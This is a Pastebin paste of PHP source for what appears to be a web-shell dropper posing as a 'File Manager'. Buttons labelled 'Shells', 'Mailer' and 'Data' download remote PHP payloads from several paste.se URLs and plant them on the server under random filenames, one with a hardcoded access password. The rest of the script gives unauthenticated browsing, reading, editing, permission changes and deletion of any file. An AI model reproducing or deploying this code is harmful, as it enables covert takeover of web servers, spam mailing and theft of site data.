Advertisement
dragondevile

Untitled

Jan 15th, 2019
587
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.42 KB | None | 0 0
  1. $input = array('leopard','lion','male','cock','drake','penguin','quail','rat','serval','swan','bear','baboon','alpaca','zebra','yak','wolf','turkey','toad','baby','calf','cria','chick','fawn','pup','kit','nymph','swarm');
  2. $rand_keys = array_rand($input, 2);
  3. ################################################
  4. $rand_mlr = 'robots'.rand(999, 123);
  5. $rand_wso = 'index'.rand(999, 123);
  6. $script_mlr = "http://dd8c325823ec3abb.paste.se/raw"; //encode : http://ac6da53258c4301f.paste.se/raw
  7. //$script_wso26 = "http://30d06a845d67a343.paste.se/raw"; //121.00 KB
  8. $script_wso26 = "http://0ac198270c6fcbe5.paste.se/raw"; //64.44 KB
  9. $ps = 'seller';
  10. ################################################
  11. session_start();
  12. set_time_limit(0);
  13. error_reporting(0);
  14. if(get_magic_quotes_gpc()){
  15. foreach($_POST as $key=>$value){$_POST[$key] = stripslashes($value);}}
  16. echo '<!DOCTYPE HTML><br><br>
  17. <HTML>
  18. <HEAD>
  19. <link href="" rel="stylesheet" type="text/css">
  20. <title>File Manager</title>
  21. <style>
  22. body{
  23. font-family: "Racing Sans One", cursive;
  24. background-color: #e6e6e6;
  25. text-shadow:0px 0px 1px #757575;
  26. }
  27. #content tr:hover{
  28. background-color: #636263;
  29. text-shadow:0px 0px 10px #fff;
  30. }
  31. #content .first{
  32. background-color: silver;
  33. }
  34. #content .first:hover{
  35. background-color: silver;
  36. text-shadow:0px 0px 1px #757575;
  37. }
  38. table{
  39. border: 1px #000000 dotted;
  40. }
  41. H1{
  42. font-family: "Rye", cursive;
  43. }
  44. a{
  45. color: #000;
  46. text-decoration: none;
  47. }
  48. a:hover{
  49. color: #fff;
  50. text-shadow:0px 0px 10px #ffffff;
  51. }
  52. input,select,textarea{
  53. border: 1px #000000 solid;
  54. -moz-border-radius: 5px;
  55. -webkit-border-radius:5px;
  56. border-radius:5px;
  57. }
  58. </style>
  59. </HEAD>
  60. <BODY>
  61. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  62. <tr><td>Current Path : ';
  63. if(isset($_GET['path'])){
  64. $path = $_GET['path'];
  65. }else{
  66. $path = getcwd();
  67. }
  68. $path = str_replace('\\','/',$path);
  69. $paths = explode('/',$path);
  70. foreach($paths as $id=>$pat){
  71. if($pat == '' && $id == 0){
  72. $a = true;
  73. echo '<a href="?path=/">/</a>';
  74. continue;
  75. }
  76. if($pat == '') continue;
  77. echo '<a href="?path=';
  78. for($i=0;$i<=$id;$i++){
  79. echo "$paths[$i]";
  80. if($i != $id) echo "/";
  81. }
  82. echo '">'.$pat.'</a>/';
  83. }
  84. echo '</td></tr><tr><td>';
  85. if(isset($_POST['session'])){
  86. $_SESSION['session'] = $_POST['sval'];
  87. }
  88. if(isset($_GET["dir"])){
  89. $_SESSION['session2'] = $_GET["dir"];
  90. }
  91. $session = $_SESSION['session'];
  92. $session2 = $_SESSION['session2'];
  93. if(isset($_POST['sex'])){
  94. $st = curl_init();
  95. curl_setopt($st,CURLOPT_URL,$script_wso26);
  96. curl_setopt($st,CURLOPT_RETURNTRANSFER,true);
  97. $save = curl_exec($st);
  98. $sexy = $path.'/'.$rand_wso.'.php';
  99. $file = fopen($sexy,"w");
  100. fwrite($file,$save);
  101. fclose($file);
  102. $a5ira=str_replace(array("$session","$session2"), "",$sexy);
  103. if (file_exists($sexy)){
  104. echo '<font color="green">File Upload Done. : <a target="_blank" href="http://'.$a5ira.'">http://'.$a5ira.'</a></font><br/>';
  105. echo '<font color="green">File Upload Done. : <a target="_blank" href="http://'.$_SERVER['HTTP_HOST'].str_replace(array($_SERVER['DOCUMENT_ROOT']), "","$sexy").'">http://'.$_SERVER['HTTP_HOST'].str_replace(array($_SERVER['DOCUMENT_ROOT']), "","$sexy").'</a></font><br/>';
  106. }
  107. else{
  108. echo '<font color="red">Error Upload Error. : <a href="http://'.$a5ira.'">http://'.$a5ira.'</a></font><br/>';
  109. }
  110. }
  111. if(isset($_POST['smart'])){
  112. $st = curl_init();
  113. curl_setopt($st,CURLOPT_URL,"http://378ba613dec8289d.paste.se/raw");
  114. curl_setopt($st,CURLOPT_RETURNTRANSFER,true);
  115. $save = curl_exec($st);
  116. $sexy = $path.'/'.$rand_wso.'.php';
  117. $file = fopen($sexy,"w");
  118. fwrite($file,$save);
  119. fclose($file);
  120. $a5ira=str_replace(array("$session","$session2"), "",$sexy);
  121. if (file_exists($sexy)){
  122. echo '<font color="green">File Upload Done. : <a target="_blank" href="http://'.$a5ira.'">http://'.$a5ira.'</a></font><br/>';
  123. echo '<font color="green">File Upload Done. : <a target="_blank" href="http://'.$_SERVER['HTTP_HOST'].str_replace(array($_SERVER['DOCUMENT_ROOT']), "","$sexy").'">http://'.$_SERVER['HTTP_HOST'].str_replace(array($_SERVER['DOCUMENT_ROOT']), "","$sexy").'</a></font><br/>';
  124.  
  125. }
  126. else{
  127. echo '<font color="red">Error Upload Error. : <a href="http://'.$a5ira.'">http://'.$a5ira.'</a></font><br/>';
  128. }
  129. }
  130. if(isset($_POST['db'])){
  131. $st = curl_init();
  132. curl_setopt($st,CURLOPT_URL,"http://053fa87c0c6155ef.paste.se/raw");
  133. curl_setopt($st,CURLOPT_RETURNTRANSFER,true);
  134. $save = curl_exec($st);
  135. $sexy = $path.'/'.$rand_wso.'.php';
  136. $file = fopen($sexy,"w");
  137. fwrite($file,$save);
  138. fclose($file);
  139. $a5ira=str_replace(array("$session","$session2"), "",$sexy);
  140. if (file_exists($sexy)){
  141. echo '<font color="green">File Upload Done. : <a target="_blank" href="http://'.$a5ira.'?user">http://'.$a5ira.'?user</a></font><br/>';
  142. echo '<font color="green">File Upload Done. : <a target="_blank" href="http://'.$_SERVER['HTTP_HOST'].str_replace(array($_SERVER['DOCUMENT_ROOT']), "","$sexy").'?user">http://'.$_SERVER['HTTP_HOST'].str_replace(array($_SERVER['DOCUMENT_ROOT']), "","$sexy").'?user</a></font><br/>';
  143.  
  144. }
  145. else{
  146. echo '<font color="red">Error Upload Error. : <a href="http://'.$a5ira.'">http://'.$a5ira.'?user</a></font><br/>';
  147. }
  148. }
  149. if(isset($_POST['readme'])){
  150. $st = curl_init();
  151. curl_setopt($st,CURLOPT_URL,"http://128a6e08351405e2.paste.se/raw");
  152. curl_setopt($st,CURLOPT_RETURNTRANSFER,true);
  153. $save = curl_exec($st);
  154. $sexy = $path.'/'.$rand_wso.'.php';
  155. $file = fopen($sexy,"w");
  156. fwrite($file,$save);
  157. fclose($file);
  158. $a5ira=str_replace(array("$session","$session2"), "",$sexy);
  159. if (file_exists($sexy)){
  160. echo '<font color="green">File Upload Done. : <a target="_blank" href="http://'.$a5ira.'">http://'.$a5ira.'</a></font><br/>';
  161. echo '<font color="green">File Upload Done. : <a target="_blank" href="http://'.$_SERVER['HTTP_HOST'].str_replace(array($_SERVER['DOCUMENT_ROOT']), "","$sexy").'">http://'.$_SERVER['HTTP_HOST'].str_replace(array($_SERVER['DOCUMENT_ROOT']), "","$sexy").'</a></font><br/>';
  162.  
  163. }
  164. else{
  165. echo '<font color="red">Error Upload Error. : <a href="http://'.$a5ira.'">http://'.$a5ira.'</a></font><br/>';
  166. }
  167. }
  168. if(isset($_POST['mlr'])){
  169. $st = curl_init();
  170. curl_setopt($st,CURLOPT_URL,$script_mlr);
  171. curl_setopt($st,CURLOPT_RETURNTRANSFER,true);
  172. $save = curl_exec($st);
  173. $sexy = $path.'/'.$rand_mlr.'.php';
  174. $pass = '?pass='.$ps;
  175. $file = fopen($sexy,"w");
  176. fwrite($file,$save);
  177. fclose($file);
  178. $a5ira=str_replace(array("$session","$session2"), "",$sexy);
  179. if (file_exists($sexy)){
  180. echo '<font color="green">File Upload Done. : <a target="_blank" href="http://'.$a5ira.$pass.'">http://'.$a5ira.$pass.'</a></font><br/>';
  181. echo '<font color="green">File Upload Done. : <a target="_blank" href="http://'.$_SERVER['HTTP_HOST'].str_replace(array($_SERVER['DOCUMENT_ROOT']), "","$sexy").$pass.'">http://'.$_SERVER['HTTP_HOST'].str_replace(array($_SERVER['DOCUMENT_ROOT']), "","$sexy").$pass.'</a></font><br/>';
  182. }
  183. else{
  184. echo '<font color="red">Error Upload Error. : <a href="http://'.$a5ira.$pass.'">http://'.$a5ira.$pass.'</a></font><br/>';
  185. }
  186. }
  187. echo '<form enctype="multipart/form-data" method="POST">
  188. Execute : <input type="submit" value="Shells" name="sex" style=" background-color: #c3c3ff; ">
  189. <input type="submit" value="Shells" name="readme" style=" background-color: #red; ">
  190. <input type="submit" value="Mailer" name="mlr" style=" background-color: #b7f1b7; ">
  191. <input type="submit" value="Data" name="db" style=" background-color: #b6d8e0;">
  192. <input type="submit" value="Shells" name="smart" style=" background-color: #d1f163; ">
  193. </form>
  194. ';
  195. echo'
  196. <form enctype="multipart/form-data" method="POST">
  197. Session: <input name="sval" type="text"';
  198. if(!empty($_SESSION['session'])){echo 'value="'.$_SESSION['session'].'"';} else{ echo"/";}
  199. echo' style= "margin-right: 5px; width: 152px;"><input type="submit" name="session">';
  200. if(!empty($_SESSION['session2'])){echo ' <input style= "margin-right: 10px; width: 152px;" type="text" value="'.$_SESSION['session2'].'">';} else{ echo"";}
  201. echo'
  202. </form>
  203. </td></tr>';
  204. if(isset($_GET['filesrc'])){
  205. echo "<tr><td>Current File : ";
  206. echo $_GET['filesrc'];
  207. echo '</tr></td></table><br />';
  208. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  209. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  210. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  211. if($_POST['opt'] == 'chmod'){
  212. if(isset($_POST['perm'])){
  213. if(chmod($_POST['path'],$_POST['perm'])){
  214. echo '<font color="green">Change Permission Done.</font><br />';
  215. }else{
  216. echo '<font color="red">Change Permission Error.</font><br />';
  217. }
  218. }
  219. echo '<form method="POST">
  220. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  221. <input type="hidden" name="path" value="'.$_POST['path'].'">
  222. <input type="hidden" name="opt" value="chmod">
  223. <input type="submit" value="Go" />
  224. </form>';
  225. }elseif($_POST['opt'] == 'rename'){
  226. if(isset($_POST['newname'])){
  227. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  228. echo '<font color="green">Change Name Done.</font><br />';
  229. }else{
  230. echo '<font color="red">Change Name Error.</font><br />';
  231. }
  232. $_POST['name'] = $_POST['newname'];
  233. }
  234. echo '<form method="POST">
  235. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  236. <input type="hidden" name="path" value="'.$_POST['path'].'">
  237. <input type="hidden" name="opt" value="rename">
  238. <input type="submit" value="Go" />
  239. </form>';
  240. }elseif($_POST['opt'] == 'edit'){
  241. if(isset($_POST['src'])){
  242. $fp = fopen($_POST['path'],'w');
  243. if(fwrite($fp,$_POST['src'])){
  244. echo '<font color="green">Edit File Done.</font><br />';
  245. }else{
  246. echo '<font color="red">Edit File Error.</font><br />';
  247. }
  248. fclose($fp);
  249. }
  250. echo '<form method="POST">
  251. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  252. <input type="hidden" name="path" value="'.$_POST['path'].'">
  253. <input type="hidden" name="opt" value="edit">
  254. <input type="submit" value="Go" />
  255. </form>';
  256. }
  257. echo '</center>';
  258. }else{
  259. echo '</table><br /><center>';
  260. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  261. if($_POST['type'] == 'dir'){
  262. if(rmdir($_POST['path'])){
  263. echo '<font color="green">Delete Dir Done.</font><br />';
  264. }else{
  265. echo '<font color="red">Delete Dir Error.</font><br />';
  266. }
  267. }elseif($_POST['type'] == 'file'){
  268. if(unlink($_POST['path'])){
  269. echo '<font color="green">Delete File Done.</font><br />';
  270. }else{
  271. echo '<font color="red">Delete File Error.</font><br />';
  272. }
  273. }
  274. }
  275. echo '</center>';
  276. $scandir = scandir($path);
  277. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  278. <tr class="first">
  279. <td><center>Name</center></td>
  280. <td><center>Size</center></td>
  281. <td><center>Permissions</center></td>
  282. <td><center>Options</center></td>
  283. </tr>';
  284. foreach($scandir as $dir){
  285. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
  286. echo "<tr>
  287. <td><a href=\"?path=$path/$dir\">$dir</a></td>
  288. <td><center>--</center></td>
  289. <td><center>";
  290. if(is_writable("$path/$dir")) echo '<font color="green">';
  291. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
  292. echo perms("$path/$dir");
  293. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
  294. echo "</center></td>
  295. <td><center><form method=\"POST\" action=\"?option&path=$path\">
  296. <select name=\"opt\">
  297. <option value=\"\"></option>
  298. <option value=\"delete\">Delete</option>
  299. <option value=\"chmod\">Chmod</option>
  300. <option value=\"rename\">Rename</option>
  301. </select>
  302. <input type=\"hidden\" name=\"type\" value=\"dir\">
  303. <input type=\"hidden\" name=\"name\" value=\"$dir\">
  304. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
  305. <input type=\"submit\" value=\">\" />
  306. </form></center></td>
  307. </tr>";
  308. }
  309. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  310. foreach($scandir as $file){
  311. if(!is_file("$path/$file")) continue;
  312. $size = filesize("$path/$file")/1024;
  313. $size = round($size,3);
  314. if($size >= 1024){
  315. $size = round($size/1024,2).' MB';
  316. }else{
  317. $size = $size.' KB';
  318. }
  319. echo "<tr>
  320. <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
  321. <td><center>".$size."</center></td>
  322. <td><center>";
  323. if(is_writable("$path/$file")) echo '<font color="green">';
  324. elseif(!is_readable("$path/$file")) echo '<font color="red">';
  325. echo perms("$path/$file");
  326. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
  327. echo "</center></td>
  328. <td><center><form method=\"POST\" action=\"?option&path=$path\">
  329. <select name=\"opt\">
  330. <option value=\"\"></option>
  331. <option value=\"delete\">Delete</option>
  332. <option value=\"chmod\">Chmod</option>
  333. <option value=\"rename\">Rename</option>
  334. <option value=\"edit\">Edit</option>
  335. </select>
  336. <input type=\"hidden\" name=\"type\" value=\"file\">
  337. <input type=\"hidden\" name=\"name\" value=\"$file\">
  338. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
  339. <input type=\"submit\" value=\">\" />
  340. </form></center></td>
  341. </tr>";
  342. }
  343. echo '</table>
  344. </div>';
  345. }
  346. echo '<br /></BODY>
  347. </HTML>';
  348. function perms($file){
  349. $perms = fileperms($file);
  350. if (($perms & 0xC000) == 0xC000) {
  351. // Socket
  352. $info = 's';
  353. } elseif (($perms & 0xA000) == 0xA000) {
  354. // Symbolic Link
  355. $info = 'l';
  356. } elseif (($perms & 0x8000) == 0x8000) {
  357. // Regular
  358. $info = '-';
  359. } elseif (($perms & 0x6000) == 0x6000) {
  360. // Block special
  361. $info = 'b';
  362. } elseif (($perms & 0x4000) == 0x4000) {
  363. // Directory
  364. $info = 'd';
  365. } elseif (($perms & 0x2000) == 0x2000) {
  366. // Character special
  367. $info = 'c';
  368. } elseif (($perms & 0x1000) == 0x1000) {
  369. // FIFO pipe
  370. $info = 'p';
  371. } else {
  372. // Unknown
  373. $info = 'u';
  374. }
  375. // Owner
  376. $info .= (($perms & 0x0100) ? 'r' : '-');
  377. $info .= (($perms & 0x0080) ? 'w' : '-');
  378. $info .= (($perms & 0x0040) ?
  379. (($perms & 0x0800) ? 's' : 'x' ) :
  380. (($perms & 0x0800) ? 'S' : '-'));
  381. // Group
  382. $info .= (($perms & 0x0020) ? 'r' : '-');
  383. $info .= (($perms & 0x0010) ? 'w' : '-');
  384. $info .= (($perms & 0x0008) ?
  385. (($perms & 0x0400) ? 's' : 'x' ) :
  386. (($perms & 0x0400) ? 'S' : '-'));
  387. // World
  388. $info .= (($perms & 0x0004) ? 'r' : '-');
  389. $info .= (($perms & 0x0002) ? 'w' : '-');
  390. $info .= (($perms & 0x0001) ?
  391. (($perms & 0x0200) ? 't' : 'x' ) :
  392. (($perms & 0x0200) ? 'T' : '-'));
  393. return $info;
  394. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement